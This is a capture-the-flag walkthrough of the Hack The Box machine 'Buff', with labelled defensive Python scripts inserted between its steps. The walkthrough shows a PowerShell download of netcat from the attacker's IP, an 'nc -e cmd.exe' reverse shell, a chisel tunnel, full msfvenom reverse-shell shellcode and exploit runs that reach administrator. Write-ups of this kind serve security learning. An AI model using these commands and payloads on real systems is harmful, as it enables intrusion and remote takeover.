HTB Buff done
Buff
OS:
Windows
Technology:
Gym Management Software 1.0
IP Address:
10.129.212.178
Open ports:
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
Users and pass:
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.212.178_nmap 10.129.212.178 ; cat 10.129.212.178_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 13:02 UTC
Nmap scan report for 10.129.212.178
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Ffuf: http://10.129.212.178:8080
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ ffuf -u http://10.129.212.178:8080/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.129.212.178_8080_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.212.178:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.212.178_8080_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
About.php [Status: 200, Size: 5337, Words: 999, Lines: 142, Duration: 1937ms]
Contact.php [Status: 200, Size: 4169, Words: 798, Lines: 119, Duration: 1804ms]
Home.php [Status: 200, Size: 143, Words: 18, Lines: 3, Duration: 364ms]
LICENSE [Status: 200, Size: 18025, Words: 3098, Lines: 339, Duration: 102ms]
Index.php [Status: 200, Size: 4969, Words: 935, Lines: 134, Duration: 1722ms]
README.md [Status: 200, Size: 309, Words: 32, Lines: 17, Duration: 34ms]
Readme.md [Status: 200, Size: 309, Words: 32, Lines: 17, Duration: 293ms]
about.php [Status: 200, Size: 5337, Words: 999, Lines: 142, Duration: 1174ms]
att [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 273ms]
att.php [Status: 200, Size: 816, Words: 111, Lines: 28, Duration: 1379ms]
boot [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 268ms]
cgi-bin/ [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 382ms]
contact.php [Status: 200, Size: 4169, Words: 798, Lines: 119, Duration: 1247ms]
edit.php [Status: 200, Size: 4282, Words: 844, Lines: 122, Duration: 1920ms]
ex [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 32ms]
facilities.php [Status: 200, Size: 5961, Words: 1011, Lines: 123, Duration: 1697ms]
feedback.php [Status: 200, Size: 4252, Words: 760, Lines: 114, Duration: 1247ms]
home.php [Status: 200, Size: 143, Words: 18, Lines: 3, Duration: 379ms]
img [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 46ms]
include [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 380ms]
index.php [Status: 200, Size: 4969, Words: 935, Lines: 134, Duration: 1488ms]
license [Status: 200, Size: 18025, Words: 3098, Lines: 339, Duration: 233ms]
licenses [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 369ms]
packages.php [Status: 200, Size: 7791, Words: 2315, Lines: 169, Duration: 2312ms]
phpmyadmin [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 309ms]
profile [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 312ms]
readme.md [Status: 200, Size: 309, Words: 32, Lines: 17, Duration: 31ms]
register.php [Status: 200, Size: 137, Words: 23, Lines: 4, Duration: 2003ms]
server-info [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 297ms]
server-status [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 50ms]
up.php [Status: 200, Size: 209, Words: 23, Lines: 5, Duration: 871ms]
upload [Status: 301, Size: 348, Words: 22, Lines: 10, Duration: 446ms]
upload.php [Status: 200, Size: 107, Words: 12, Lines: 3, Duration: 1837ms]
workouts [Status: 301, Size: 350, Words: 22, Lines: 10, Duration: 273ms]
:: Progress: [143283/143283] :: Job [1/1] :: 161 req/sec :: Duration: [0:17:34] :: Errors: 0 ::
Find version of software: Gym Management Software 1.0
http://10.129.212.178:8080/contact.php
Gym Management Software 1.0
Exploit: Gym Management 1.0 unauthenticated RCE
[Gym Management 1.0 unauthenticated RCE](https://github.com/0xConstant/Gym-Management-1.0-unauthenticated-RCE)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ git clone https://github.com/0xConstant/Gym-Management-1.0-unauthenticated-RCE.git
Cloning into 'Gym-Management-1.0-unauthenticated-RCE'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (12/12), 5.77 KiB | 1.44 MiB/s, done.
Resolving deltas: 100% (1/1), done.
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Buff/Gym-Management-1.0-unauthenticated-RCE]
└─$ python3 exploit.py http://10.129.212.178:8080
Shell has been uploaded: http://10.129.212.178:8080/upload/AixPvnDIFw.php
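The exploit above dropped a .php file into /gym/upload/, a directory that should only ever hold user-supplied images. As an added example (not from the writeup and not from the Gym Management project), the script below audits such a directory the way a defender would after an incident: it flags any file with a server-side script extension anywhere in its name (so shell.php.png is caught too), any file whose bytes contain a PHP open tag, and any file that does not start with a known image signature. The directory contents built in demo() are constructed for this example; the file name reuses the one the exploit printed, the content is a harmless placeholder.

```python
"""Audit a web upload directory for files that should not be there.

Added example, not part of the writeup or of the Gym Management project.
The directory built in demo() is constructed for the demonstration.
"""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Extensions the Apache/PHP stack on the box would hand to the interpreter.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps"}
# A PHP open tag inside an "image" is a strong webshell indicator.
PHP_TAG = re.compile(rb"<\?(php\b|=)")
# Magic bytes of the image types an upload form would normally accept.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")


def classify(path: Path) -> list[str]:
    """Return the reasons a file looks suspicious; an empty list means clean."""
    reasons = []
    # path.suffixes returns every extension, so a double extension is caught too
    if any(s.lower() in SCRIPT_EXTENSIONS for s in path.suffixes):
        reasons.append("script extension in filename")
    data = path.read_bytes()
    if PHP_TAG.search(data):
        reasons.append("php open tag in content")
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("no known image magic bytes")
    return reasons


def scan_upload_dir(root: Path) -> dict[str, list[str]]:
    """Walk root and map each suspicious file (path relative to root) to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            reasons = classify(p)
            if reasons:
                findings[p.relative_to(root).as_posix()] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed upload directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # a legitimate PNG upload: valid signature, no script content
        (root / "avatar.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        # same file name the exploit printed; the content is a harmless placeholder
        (root / "AixPvnDIFw.php").write_bytes(b"<?php echo 'placeholder'; ?>")
        # valid JPEG header with PHP appended: passes a magic-byte check on its own
        (root / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>")
        return scan_upload_dir(root)


if __name__ == "__main__":
    for name, why in demo().items():
        print(f"{name}: {', '.join(why)}")
```

Run it against the real upload directory with `scan_upload_dir(Path(r"C:\xampp\htdocs\gym\upload"))`; the content check matters more than the extension check, because the second constructed file shows how a polyglot with a valid image header slips past signature validation alone.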
Create a stable revshell (netcat)
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Buff/Gym-Management-1.0-unauthenticated-RCE]
└─$ python3 exploit.py http://10.129.212.178:8080
Shell has been uploaded: http://10.129.212.178:8080/upload/AixPvnDIFw.php
----------------------------------------------------------------------
Shell> powershell Invoke-WebRequest -Uri http://10.10.14.127/nc64.exe -Outfile nc.exe
Shell> nc.exe 10.10.14.127 81 -e cmd.exe
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ netcat -lvnp 81
listening on [any] 81 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.212.178] 49902
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
Read flag: user.txt
C:\xampp\htdocs\gym\upload>cd C:
cd C:
C:\xampp\htdocs\gym\upload
C:\xampp\htdocs\gym\upload>cd C:\Users\shaun\Desktop
cd C:\Users\shaun\Desktop
C:\Users\shaun\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Desktop
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
19/11/2024 11:55 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 9,234,538,496 bytes free
C:\Users\shaun\Desktop>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\shaun\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::7c23:b5b0:ad9e:4b3c
Temporary IPv6 Address. . . . . . : dead:beef::d5aa:8bd3:c4cf:3a1c
Link-local IPv6 Address . . . . . : fe80::7c23:b5b0:ad9e:4b3c%10
IPv4 Address. . . . . . . . . . . : 10.129.212.178
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%10
10.129.0.1
C:\Users\shaun\Desktop>type user.txt
type user.txt
b29e3dc1b4eaaa0ad93ce2f4537ea59d
C:\Users\shaun\Desktop>
Privilege Escalation
Find software: CloudMe_1112.exe
C:\Users\shaun>cd Downloads
cd Downloads
C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 9,676,242,944 bytes free
Find running software: CloudMe
C:\Users\shaun\Downloads>netstat -ano | findstr 8888 & tasklist | findstr CloudMe.exe
netstat -ano | findstr 8888 & tasklist | findstr CloudMe.exe
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 2244
CloudMe.exe 2244 0 37,252 K
C:\Users\shaun\Downloads>
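CloudMe listens on 127.0.0.1:8888 only, which is why the nmap scan never saw it and why a tunnel is needed later. As an added example (not from the writeup), the script below joins `netstat -ano` and `tasklist` output on PID, producing an inventory of every listener with the process behind it, and singles out loopback-only services, which are exactly the ones an external scan or a vulnerability scanner will miss. The two sample outputs are constructed: the CloudMe rows are the ones shown on the page, the other rows are made up to exercise the parser (IPv6 brackets, a UDP row without a State column, an ESTABLISHED connection that must be skipped).

```python
"""Correlate `netstat -ano` listeners with `tasklist` processes.

Added example, not part of the writeup. Sample outputs are constructed:
the 8888/CloudMe rows mirror the page, the rest are made up.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       1820
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2244
  TCP    10.129.212.178:49902   10.10.14.127:81        ESTABLISHED     3340
  TCP    [::]:7680              [::]:0                 LISTENING       4
  UDP    0.0.0.0:5353           *:*                                     1100
"""

TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0        152 K
httpd.exe                     1820 Services                   0     28,104 K
CloudMe.exe                   2244                            0     37,252 K
nc.exe                        3340 Services                   0      1,204 K
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    pid: int
    image: str


def parse_tasklist(text: str) -> dict[int, str]:
    """Map PID -> image name; the image is the first column, the PID the second."""
    procs = {}
    for line in text.splitlines():
        if line.startswith(("Image Name", "=")):
            continue
        m = re.match(r"^(\S.*?)\s+(\d+)\s+", line)
        if m:
            procs[int(m.group(2))] = m.group(1)
    return procs


def parse_netstat(text: str) -> list[tuple[str, str, int, str, int]]:
    """Return (proto, local_addr, local_port, state, pid) for every socket row."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        # UDP rows have no State column, so the PID is the last token in both cases
        state = parts[3] if proto == "TCP" else ""
        pid = int(parts[-1])
        addr, _, port = local.rpartition(":")
        rows.append((proto, addr.strip("[]"), int(port), state, pid))
    return rows


def listeners(netstat_text: str, tasklist_text: str) -> list[Listener]:
    """Join the two outputs on PID, keeping only sockets that accept traffic."""
    procs = parse_tasklist(tasklist_text)
    out = []
    for proto, addr, port, state, pid in parse_netstat(netstat_text):
        if proto == "TCP" and state != "LISTENING":
            continue
        out.append(Listener(proto, addr, port, pid, procs.get(pid, "<unknown>")))
    return out


def loopback_only(items: list[Listener]) -> list[Listener]:
    """Listeners reachable only from the host itself (the CloudMe case)."""
    return [l for l in items if l.addr in ("127.0.0.1", "::1")]


if __name__ == "__main__":
    found = listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE)
    for l in found:
        print(f"{l.proto:3} {l.addr}:{l.port:<5} pid={l.pid:<5} {l.image}")
    print("loopback only:", [f"{l.image} on {l.port}" for l in loopback_only(found)])
```

On a live host, feed the script the raw output of the two commands (`netstat -ano` and `tasklist`) instead of the samples; a loopback-only listener owned by a third-party binary in a user's Downloads folder is the kind of finding that deserves a version check against the vendor's advisories.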
Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
[CloudMe 1.11.2 - Buffer Overflow (PoC)](https://www.exploit-db.com/exploits/48389)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ wget https://www.exploit-db.com/download/48389
--2024-11-20 08:40:39-- https://www.exploit-db.com/download/48389
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2043 (2.0K) [application/txt]
Saving to: ‘48389’
48389 100%[==============================================>] 2.00K --.-KB/s in 0s
2024-11-20 08:40:40 (81.2 MB/s) - ‘48389’ saved [2043/2043]
Create tunnel via chisel
C:\Users\shaun\Desktop>chisel.exe client 10.10.14.127:9000 R:8888:localhost:8888
chisel.exe client 10.10.14.127:9000 R:8888:localhost:8888
2024/11/20 08:33:35 client: Connecting to ws://10.10.14.127:9000
2024/11/20 08:33:35 client: Connected (Latency 33.3692ms)
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Buff/Gym-Management-1.0-unauthenticated-RCE]
└─$ chisel server -p 9000 --reverse
2024/11/20 08:32:45 server: Reverse tunnelling enabled
2024/11/20 08:32:45 server: Fingerprint S9WeSOGS/KQvo+88z7sU/icOK7lMdpBOEf3IkawvKFg=
2024/11/20 08:32:45 server: Listening on http://0.0.0.0:9000
2024/11/20 08:33:03 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2024/11/20 08:33:03 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ ss -tulpn | grep "chisel"
tcp LISTEN 0 4096 *:8888 *:* users:(("chisel",pid=6255,fd=7))
tcp LISTEN 0 4096 *:9000 *:* users:(("chisel",pid=6255,fd=5))
Edit exploit
I have to create a reverse shell payload with msfvenom.
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.127 LPORT=3000 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload = b""
payload += b"\xb8\x2a\xc6\x2f\xe6\xda\xca\xd9\x74\x24\xf4"
payload += b"\x5e\x31\xc9\xb1\x52\x31\x46\x12\x83\xee\xfc"
payload += b"\x03\x6c\xc8\xcd\x13\x8c\x3c\x93\xdc\x6c\xbd"
payload += b"\xf4\x55\x89\x8c\x34\x01\xda\xbf\x84\x41\x8e"
payload += b"\x33\x6e\x07\x3a\xc7\x02\x80\x4d\x60\xa8\xf6"
payload += b"\x60\x71\x81\xcb\xe3\xf1\xd8\x1f\xc3\xc8\x12"
payload += b"\x52\x02\x0c\x4e\x9f\x56\xc5\x04\x32\x46\x62"
payload += b"\x50\x8f\xed\x38\x74\x97\x12\x88\x77\xb6\x85"
payload += b"\x82\x21\x18\x24\x46\x5a\x11\x3e\x8b\x67\xeb"
payload += b"\xb5\x7f\x13\xea\x1f\x4e\xdc\x41\x5e\x7e\x2f"
payload += b"\x9b\xa7\xb9\xd0\xee\xd1\xb9\x6d\xe9\x26\xc3"
payload += b"\xa9\x7c\xbc\x63\x39\x26\x18\x95\xee\xb1\xeb"
payload += b"\x99\x5b\xb5\xb3\xbd\x5a\x1a\xc8\xba\xd7\x9d"
payload += b"\x1e\x4b\xa3\xb9\xba\x17\x77\xa3\x9b\xfd\xd6"
payload += b"\xdc\xfb\x5d\x86\x78\x70\x73\xd3\xf0\xdb\x1c"
payload += b"\x10\x39\xe3\xdc\x3e\x4a\x90\xee\xe1\xe0\x3e"
payload += b"\x43\x69\x2f\xb9\xa4\x40\x97\x55\x5b\x6b\xe8"
payload += b"\x7c\x98\x3f\xb8\x16\x09\x40\x53\xe6\xb6\x95"
payload += b"\xf4\xb6\x18\x46\xb5\x66\xd9\x36\x5d\x6c\xd6"
payload += b"\x69\x7d\x8f\x3c\x02\x14\x6a\xd7\x27\xe3\x7a"
payload += b"\x58\x50\xf1\x82\xad\x18\x7c\x64\xdb\x48\x29"
payload += b"\x3f\x74\xf0\x70\xcb\xe5\xfd\xae\xb6\x26\x75"
payload += b"\x5d\x47\xe8\x7e\x28\x5b\x9d\x8e\x67\x01\x08"
payload += b"\x90\x5d\x2d\xd6\x03\x3a\xad\x91\x3f\x95\xfa"
payload += b"\xf6\x8e\xec\x6e\xeb\xa9\x46\x8c\xf6\x2c\xa0"
payload += b"\x14\x2d\x8d\x2f\x95\xa0\xa9\x0b\x85\x7c\x31"
payload += b"\x10\xf1\xd0\x64\xce\xaf\x96\xde\xa0\x19\x41"
payload += b"\x8c\x6a\xcd\x14\xfe\xac\x8b\x18\x2b\x5b\x73"
payload += b"\xa8\x82\x1a\x8c\x05\x43\xab\xf5\x7b\xf3\x54"
payload += b"\x2c\x38\x03\x1f\x6c\x69\x8c\xc6\xe5\x2b\xd1"
payload += b"\xf8\xd0\x68\xec\x7a\xd0\x10\x0b\x62\x91\x15"
payload += b"\x57\x24\x4a\x64\xc8\xc1\x6c\xdb\xe9\xc3"
---
Copy and paste the payload (above) into the exploit.
Run exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ python3 48389
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Buff]
└─$ netcat -lvnp 3000
listening on [any] 3000 ...
connect to [10.10.14.127] from (UNKNOWN) [10.129.212.178] 50142
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
Read flag: root.txt
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\Administrator\Desktop
18/07/2020 16:36 <DIR> .
18/07/2020 16:36 <DIR> ..
16/06/2020 15:41 1,417 Microsoft Edge.lnk
19/11/2024 11:55 34 root.txt
2 File(s) 1,451 bytes
2 Dir(s) 9,675,681,792 bytes free
C:\Users\Administrator\Desktop>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
buff\administrator S-1-5-21-2277156429-3381729605-2640630771-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
ERROR: Unable to get user claims information.
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::19c
IPv6 Address. . . . . . . . . . . : dead:beef::7c23:b5b0:ad9e:4b3c
Temporary IPv6 Address. . . . . . : dead:beef::d5aa:8bd3:c4cf:3a1c
Link-local IPv6 Address . . . . . : fe80::7c23:b5b0:ad9e:4b3c%10
IPv4 Address. . . . . . . . . . . : 10.129.212.178
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%10
10.129.0.1
C:\Users\Administrator\Desktop>type root.txt
type root.txt
aaf285f84fd76f45cdb9f073e25da8c0
C:\Users\Administrator\Desktop>
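The two `whoami /all` dumps on this page (shaun at Medium integrity with five privileges, Administrator at High integrity with SeDebugPrivilege, SeImpersonatePrivilege and more) are easier to compare by parsing them than by eyeballing. As an added example (not from the writeup), the script below parses the USER, GROUP and PRIVILEGES blocks and reports what the second token gained over the first, which is the same check a defender runs when comparing a baseline token against a suspicious one. The two samples are condensed from the page's output with whoami's usual column spacing restored; the HIGH_RISK set is my own selection of privileges that on their own allow reaching SYSTEM or reading any file.

```python
"""Parse `whoami /all` output and report what a second token gained.

Added example, not part of the writeup. SHAUN and ADMIN are condensed
from the page's output; HIGH_RISK is the author-of-this-example's choice.
"""
import re
from dataclasses import dataclass, field

# Privileges whose holder can, on their own, reach SYSTEM or read any file.
HIGH_RISK = {"SeDebugPrivilege", "SeImpersonatePrivilege", "SeBackupPrivilege",
             "SeRestorePrivilege", "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege"}
SID_RE = re.compile(r"S-1-[\d-]+")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")
TYPE_RE = re.compile(r"\s+(Well-known group|Alias|Group|Label)$")


@dataclass
class TokenInfo:
    user: str = ""
    sid: str = ""
    integrity: str = ""
    groups: dict = field(default_factory=dict)      # group name -> SID
    privileges: dict = field(default_factory=dict)  # privilege -> Enabled/Disabled


def parse_whoami_all(text: str) -> TokenInfo:
    """Walk the three whoami sections; header and separator rows carry no SID."""
    info, section = TokenInfo(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(" INFORMATION"):
            section = line.split()[0]            # USER / GROUP / PRIVILEGES
        elif not line or set(line) <= {"-", "=", " "}:
            continue
        elif section == "USER" and (m := SID_RE.search(line)):
            info.user, info.sid = line[:m.start()].strip(), m.group(0)
        elif section == "GROUP" and (m := SID_RE.search(line)):
            name = line[:m.start()].strip()
            lvl = re.match(r"Mandatory Label\\(\w+) Mandatory Level", name)
            if lvl:                              # the label row is the integrity level
                info.integrity = lvl.group(1)
            else:                                # drop the Type column, keep the name
                info.groups[TYPE_RE.sub("", name)] = m.group(0)
        elif section == "PRIVILEGES" and (m := PRIV_RE.match(line)):
            info.privileges[m.group(1)] = m.group(2)
    return info


def escalation_report(before: TokenInfo, after: TokenInfo) -> dict:
    """Groups and privileges the `after` token holds that `before` did not."""
    gained = sorted(set(after.privileges) - set(before.privileges))
    # "Disabled" only means not enabled in this token; the holder may enable it,
    # so gained privileges count as risk regardless of their current state.
    return {
        "user": (before.user, after.user),
        "integrity": (before.integrity, after.integrity),
        "gained_groups": sorted(set(after.groups) - set(before.groups)),
        "gained_privileges": gained,
        "newly_enabled": sorted(p for p, s in after.privileges.items()
                                if s == "Enabled" and before.privileges.get(p) != "Enabled"),
        "high_risk_gained": sorted(p for p in gained if p in HIGH_RISK),
    }


SHAUN = r"""USER INFORMATION
User Name  SID
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
Group Name    Type             SID          Attributes
Everyone      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
Privilege Name          Description              State
SeShutdownPrivilege     Shut down the system     Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
"""

ADMIN = r"""USER INFORMATION
User Name          SID
buff\administrator S-1-5-21-2277156429-3381729605-2640630771-500
GROUP INFORMATION
Group Name                                                    Type             SID          Attributes
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
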